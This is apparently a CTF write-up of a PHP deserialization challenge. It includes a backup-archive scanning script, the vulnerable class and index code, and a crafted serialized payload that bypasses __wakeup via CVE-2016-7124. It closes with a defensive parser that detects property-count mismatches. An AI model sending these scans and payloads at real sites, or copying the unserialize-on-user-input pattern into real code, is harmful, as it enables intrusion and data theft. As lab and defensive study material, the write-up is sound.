
PHP

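Sharing a rather interesting script:

```python
# python3
import requests

# url1 is the address to scan, with no trailing '/'
url1 = 'http://dc978cce-0571-40d6-8a75-ac2c41c57fed.node3.buuoj.cn'
# Common file names for website source-code backups
list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
# Common file extensions for website source-code backups
list2 = ['tar', 'tar.gz', 'zip', 'rar', 'bak']
for i in list1:
    for j in list2:
        back = str(i) + '.' + str(j)
        url = str(url1) + '/' + back
        # Print each candidate name followed by the length of the response body
        print(back + ' ', end='')
        print(len(requests.get(url).text))
```

Source: a commonly used script for finding website source-code backups; the wordlists can be extended as needed.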
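The scan turns up www.zip. After downloading it, the site's pages turn out to contain a fake flag, and the archive also includes class.php.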
```php
<?php
include 'flag.php';

error_reporting(0);

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>
```
The class is used in index.php:

```php
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
```
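The password must be 100 and the username must be admin, but the __wakeup function sets username to 'guest', so __wakeup has to be bypassed.

This is a classic challenge topic: it relies on CVE-2016-7124, which allows __wakeup to be bypassed on specific PHP versions.

Note that public, private and protected properties are each represented differently in the serialized string, so take care to distinguish them when using it.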
When the class is:

```php
<?php
class Example{
    public $test = 'a';
}
$example = new Example();
echo serialize($example);
```

The result is:

```
O:7:"Example":1:{s:4:"test";s:1:"a";}
```
When the property is private, things get slightly more complicated.

```php
<?php
class Example{
    private $test = 'a';
}
$example = new Example();
echo serialize($example);
```

The result is:

```
O:7:"Example":1:{s:13:"%00Example%00test";s:1:"a";}
```
When the property is protected:

```php
<?php
class Example{
    protected $test = 'a';
}
$example = new Example();
echo serialize($example);
```

The result is:

```
O:7:"Example":1:{s:7:"%00*%00test";s:1:"a";}
```
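The final serialized string constructed for this challenge (note that the object header declares 3 properties while only two follow):

```
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
```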
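A defender-side check for serialized objects like the one above, added here as an example and not part of the original write-up: it URL-decodes a request parameter, walks the PHP serialization format, and reports every object whose declared property count differs from the members actually present, together with each property's visibility as described earlier. The function names and the constructed sample inputs are assumptions for illustration.

```python
from urllib.parse import unquote_to_bytes

def visibility(key):
    """Classify a serialized property name by its NUL-delimited prefix."""
    if key.startswith(b"\0*\0"):
        return "protected"
    return "private" if key.startswith(b"\0") else "public"

def _counted(buf, pos):
    """Read <len>:"<bytes>" at pos; return (bytes, offset past the closing quote)."""
    colon = buf.index(b":", pos)
    start = colon + 2
    end = start + int(buf[pos:colon])
    return buf[start:end], end + 1

def parse(buf, pos, findings):
    """Parse one serialized value at buf[pos]; return (value, next offset)."""
    tag = buf[pos:pos + 1]
    if tag == b"N":                                  # N;
        return None, pos + 2
    if tag in (b"i", b"b", b"d"):                    # i:100;
        end = buf.index(b";", pos)
        return buf[pos + 2:end], end + 1
    if tag == b"s":                                  # s:<byte length>:"<bytes>";
        value, pos = _counted(buf, pos + 2)
        return value, pos + 1
    if tag not in (b"a", b"O"):
        raise ValueError(f"unsupported tag {tag!r} at offset {pos}")
    # O:<len>:"<class>":<count>:{...}  or  a:<count>:{...}; pos ends on the ':' before <count>
    cls, pos = _counted(buf, pos + 2) if tag == b"O" else (b"array", pos + 1)
    brace = buf.index(b":{", pos + 1)
    declared, props = int(buf[pos + 1:brace]), []
    pos = brace + 2
    while buf[pos:pos + 1] != b"}":                  # count the members really present
        key, pos = parse(buf, pos, findings)
        _, pos = parse(buf, pos, findings)
        props.append((visibility(key), key.split(b"\0")[-1].decode(errors="replace")))
    if tag == b"O" and declared != len(props):       # header count disagrees with the body
        findings.append((cls.decode(errors="replace"), declared, len(props), props))
    return props, pos + 1

def inspect(param):
    """Return (class, declared, actual, properties) for each inconsistent object."""
    findings = []
    parse(unquote_to_bytes(param), 0, findings)
    return findings

# Constructed sample inputs: the page's final string and its private-property example
SUSPICIOUS = 'O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}'
BENIGN = 'O:7:"Example":1:{s:13:"%00Example%00test";s:1:"a";}'
```

Malformed or truncated input raises `ValueError`, which a caller can treat as a reason to reject the parameter outright.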
Last modified 8mo ago